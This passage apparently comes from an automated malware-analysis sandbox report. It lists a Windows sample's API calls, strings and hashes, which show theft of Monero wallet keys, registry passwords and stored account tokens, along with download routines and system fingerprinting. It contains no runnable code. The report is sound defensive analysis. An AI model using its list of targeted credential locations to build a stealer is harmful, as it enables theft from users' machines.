                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 006414EF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: same 14 dump regions (00640000 through 00CDE000) as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 6bd2689cb703dc4a87fc0d3a83df0ac54d43954d3a06ea6423277b1e8aa4309a
                              • Instruction ID: ce20b22ee23c3f266468bb4f37285b9a04ebe643dbc360564a79531f4090f1d3
                              • Opcode Fuzzy Hash: 6bd2689cb703dc4a87fc0d3a83df0ac54d43954d3a06ea6423277b1e8aa4309a
                              • Instruction Fuzzy Hash: E15144B1D5011857DB55FBA0DD92BED733DAF54301F4042ACBA0A62091EE306B89CBAA
                              APIs
                                • Part of subcall function 006472D0: memset.MSVCRT ref: 00647314
                                • Part of subcall function 006472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0064733A
                                • Part of subcall function 006472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006473B1
                                • Part of subcall function 006472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0064740D
                                • Part of subcall function 006472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00647452
                                • Part of subcall function 006472D0: HeapFree.KERNEL32(00000000), ref: 00647459
                              • lstrcat.KERNEL32(00000000,006617FC), ref: 00647606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00647648
                              • lstrcat.KERNEL32(00000000, : ), ref: 0064765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0064768F
                              • lstrcat.KERNEL32(00000000,00661804), ref: 006476A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 006476D3
                              • lstrcat.KERNEL32(00000000,00661808), ref: 006476ED
                              • task.LIBCPMTD ref: 006476FB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: same 14 dump regions (00640000 through 00CDE000) as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: 2c895c9e59fafb553fe4bc32691a5c2a6bf7d2aec74cf0a3dde15e1048a75df6
                              • Instruction ID: 8bfaca4711a7d95f1dec117ab7664a7ca1a5a92d6427fc6b3346652aef480b45
                              • Opcode Fuzzy Hash: 2c895c9e59fafb553fe4bc32691a5c2a6bf7d2aec74cf0a3dde15e1048a75df6
                              • Instruction Fuzzy Hash: 70314C71900109DFDB48EBB8DC95DFF777ABB54302B14411EF102A7291EB34A946CBA5
                              APIs
                              • memset.MSVCRT ref: 00647314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0064733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006473B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0064740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00647452
                              • HeapFree.KERNEL32(00000000), ref: 00647459
                              • task.LIBCPMTD ref: 00647555
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: same 14 dump regions (00640000 through 00CDE000) as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: 5e7cea246933253e7d67e6ca528cf6eeef728427747cd79c5fd9ddbf3a7d0bce
                              • Instruction ID: f4973c3eca1675d2d49cf1285bafdebd17f6a7c1b0c4e2ddce9f78949048b72e
                              • Opcode Fuzzy Hash: 5e7cea246933253e7d67e6ca528cf6eeef728427747cd79c5fd9ddbf3a7d0bce
                              • Instruction Fuzzy Hash: 3F610AB59141689BDB24DB50CC45BEAB7B9BF44300F0081E9E689A7241DFB06BC9CFA5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013DE370,00000000,?,00660E2C,00000000,?,00000000), ref: 00658130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00658137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00658158
                              • __aulldiv.LIBCMT ref: 00658172
                              • __aulldiv.LIBCMT ref: 00658180
                              • wsprintfA.USER32 ref: 006581AC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: same 14 dump regions (00640000 through 00CDE000) as listed in the first Memory Dump Source block above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: 283a9d65c73e60b5df84d14e7c9d74a1e40d52a8b59f8c3eb02b9d886006f6ab
                              • Instruction ID: d2adb8efcdc48f951e7da7e5ea65af23443fe7f7167fbce041d853005e59a68e
                              • Opcode Fuzzy Hash: 283a9d65c73e60b5df84d14e7c9d74a1e40d52a8b59f8c3eb02b9d886006f6ab
                              • Instruction Fuzzy Hash: FD2129B1A44208ABEB14DFD8CC49FAEB7B9FB44B41F104119F605BB2C0D77859058BA5
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                                • Part of subcall function 006447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                              • InternetOpenA.WININET(00660DF7,00000001,00000000,00000000,00000000), ref: 0064610F
                              • StrCmpCA.SHLWAPI(?,013DEC50), ref: 00646147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0064618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006461B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 006461DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0064620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00646249
                              • InternetCloseHandle.WININET(?), ref: 00646253
                              • InternetCloseHandle.WININET(00000000), ref: 00646260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: c95f987b79a3800dd673700d2f5ab7508940f6cba9d8023b2427c1419baef7d8
                              • Instruction ID: 4267c4199240c6029ea43ea4b31062bb5248237363ed4058d172a911e495ae83
                              • Opcode Fuzzy Hash: c95f987b79a3800dd673700d2f5ab7508940f6cba9d8023b2427c1419baef7d8
                              • Instruction Fuzzy Hash: 385183B1900208ABEB24DFA4DC45BEE77B9FB44701F108199B605A71C0DBB46B89CF96
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                              • lstrlen.KERNEL32(00000000), ref: 0064BC9F
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0064BCCD
                              • lstrlen.KERNEL32(00000000), ref: 0064BDA5
                              • lstrlen.KERNEL32(00000000), ref: 0064BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 127b7ffcd6b3cd4b13a07055185187878b80591be7e1c2bb70c53a1da2a5e491
                              • Instruction ID: 7732a2acc79b5ca1c6730a6dc9c9a13d8ca1aa09a263a6c67cb6529626dbced6
                              • Opcode Fuzzy Hash: 127b7ffcd6b3cd4b13a07055185187878b80591be7e1c2bb70c53a1da2a5e491
                              • Instruction Fuzzy Hash: 2DB14E719101089BDB58FBE0CC96EEE733ABF54301F44425DF906A6191EF34AA4DCBA6
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 6c93357d750c06b101168a7d859c5720f8d24200a90f0e6abd3f3645191b1d7a
                              • Instruction ID: 1adea3629d74366bb9d8f805560d015d1e8a1bf9dc3815193d01b08d704ec721
                              • Opcode Fuzzy Hash: 6c93357d750c06b101168a7d859c5720f8d24200a90f0e6abd3f3645191b1d7a
                              • Instruction Fuzzy Hash: 77F03A3090420DEFE348AFE8E90976CBB70FB08703F04019AF649862D0D6784A41EB96
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00644FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00644FD1
                              • InternetOpenA.WININET(00660DDF,00000000,00000000,00000000,00000000), ref: 00644FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00645011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00645041
                              • InternetCloseHandle.WININET(?), ref: 006450B9
                              • InternetCloseHandle.WININET(?), ref: 006450C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 7126cd99ec158135a718f6f7b34df7d10f64b8945c9e35b7022505ee28c356a3
                              • Instruction ID: 7e961dbbb510ec13cae41b680f02d51469e6c69108d81baaa13d5d92a3decaf6
                              • Opcode Fuzzy Hash: 7126cd99ec158135a718f6f7b34df7d10f64b8945c9e35b7022505ee28c356a3
                              • Instruction Fuzzy Hash: AE3114B4A00218ABDB24DF54DC85BDDB7B5FB48704F5081E9EA09A7281C7706EC58F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00658426
                              • wsprintfA.USER32 ref: 00658459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0065847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0065848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00658499
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,013DE490,00000000,000F003F,?,00000400), ref: 006584EC
                              • lstrlen.KERNEL32(?), ref: 00658501
                              • RegQueryValueExA.ADVAPI32(00000000,013DE580,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00660B34), ref: 00658599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00658608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0065861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 29b84d1efb5e92caea893c445c5b23d6e6838d67db31661e912aa2cb1a910e3c
                              • Instruction ID: dbdab64287e62e8d729b8fd6b56bbd19b42fe5a6b464b641e8cfea4e55fc561e
                              • Opcode Fuzzy Hash: 29b84d1efb5e92caea893c445c5b23d6e6838d67db31661e912aa2cb1a910e3c
                              • Instruction Fuzzy Hash: B2210A719002189FEB24DB54DC85FE9B3B9FB48701F00C599A609A6180DF71AA86CFE4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006576A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006576AB
                              • RegOpenKeyExA.ADVAPI32(80000002,013CBA28,00000000,00020119,00000000), ref: 006576DD
                              • RegQueryValueExA.ADVAPI32(00000000,013DE400,00000000,00000000,?,000000FF), ref: 006576FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00657708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 15480b042610401b1af09e374717cf16de932481d8aea3da7d2f653edcd137ba
                              • Instruction ID: eff77a0c65314794ecf8edd6cda73eaaf4b32aca6e4d5e9026e71fe139281edb
                              • Opcode Fuzzy Hash: 15480b042610401b1af09e374717cf16de932481d8aea3da7d2f653edcd137ba
                              • Instruction Fuzzy Hash: 35014FB5A04204BBFB04DBE8EC49FAAB7B9FB48702F104455FE04A72D0D67499048B61
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0065773B
                              • RegOpenKeyExA.ADVAPI32(80000002,013CBA28,00000000,00020119,006576B9), ref: 0065775B
                              • RegQueryValueExA.ADVAPI32(006576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0065777A
                              • RegCloseKey.ADVAPI32(006576B9), ref: 00657784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: eb9fb0b747e0561c79ce444ef5ce1438e88161648b4b080691b8a9c6d473d680
                              • Instruction ID: 5c35be562561537c2dcbc25a60155891cbb70901a323f7ce4630cfd793cda3d5
                              • Opcode Fuzzy Hash: eb9fb0b747e0561c79ce444ef5ce1438e88161648b4b080691b8a9c6d473d680
                              • Instruction Fuzzy Hash: 5E0112B5A40308BFFB04DBE8DC4AFAEB7B8FB48701F104559FA05A72D1DA755A048B61
                              APIs
                              • CreateFileA.KERNEL32(:e,80000000,00000003,00000000,00000003,00000080,00000000,?,00653AEE,?), ref: 006592FC
                              • GetFileSizeEx.KERNEL32(000000FF,:e), ref: 00659319
                              • CloseHandle.KERNEL32(000000FF), ref: 00659327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :e$:e
                              • API String ID: 1378416451-1916817931
                              • Opcode ID: 93b0355c17e57e6ff19c20c74098cd572044ca38f1480d7313628de69f79c8a3
                              • Instruction ID: 886c4dfb1670cb194ca3ed4e66e3fc2a7dc949a7a4e1cb45095493c8b8104623
                              • Opcode Fuzzy Hash: 93b0355c17e57e6ff19c20c74098cd572044ca38f1480d7313628de69f79c8a3
                              • Instruction Fuzzy Hash: FEF03C35E40208FBEB14DBB4DC49B9E77FAFB48711F108254BA91A72C0D67596059F50
                              APIs
                              • memset.MSVCRT ref: 006540D5
                              • RegOpenKeyExA.ADVAPI32(80000001,013DDC98,00000000,00020119,?), ref: 006540F4
                              • RegQueryValueExA.ADVAPI32(?,013DE778,00000000,00000000,00000000,000000FF), ref: 00654118
                              • RegCloseKey.ADVAPI32(?), ref: 00654122
